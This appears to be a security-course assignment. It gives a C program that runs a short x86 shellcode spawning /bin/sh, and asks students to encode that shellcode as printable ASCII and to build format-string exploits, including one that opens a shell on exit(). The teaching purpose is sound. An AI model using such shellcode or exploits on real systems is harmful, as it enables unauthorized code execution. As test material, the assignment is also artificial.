Question 1 The following is a program that tests a shellcode:
/* To compile, use
gcc -m32 -g -z execstack -o sc2_tiny sc2_tiny.c */
#include
char shellcode[]=
"x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80";
main() {
char buff[2400];
void (*fp)(void);
strcpy(buff, shellcode);
fp = (void *)buff;
fp();
}
Encode the shellcode so that only printable ASCII characters are used. Note that the encoded version must be the same as the original one after it is decoded. You need to:
1) Modify only the shellcode string in the above program so that it will work properly as the original program (i.e., to create a shell). You need to attach your code along with the evidence that it works properly.
2) Demonstrate that the decoded version is the same as the original shellcode. You can use gdb.
Question 2 Explain how you could exploit the format string vulnerability in the program so that you can cause the program to display the following message:
I am on the way to become the King of Penetration Testing.
However, you cannot show the following the message:
I am still a novice Penetration Tester.
Then you need to implement and demonstrate your exploitation.
Question 3 Develop and implement an exploitation of the format string vulnerability in the program so that you can create a shell when function exit() is called. For this question, you can assume that the stack is executable (by compiling the program with -z execstack flag). Here you have the freedom to define additional environmental variables.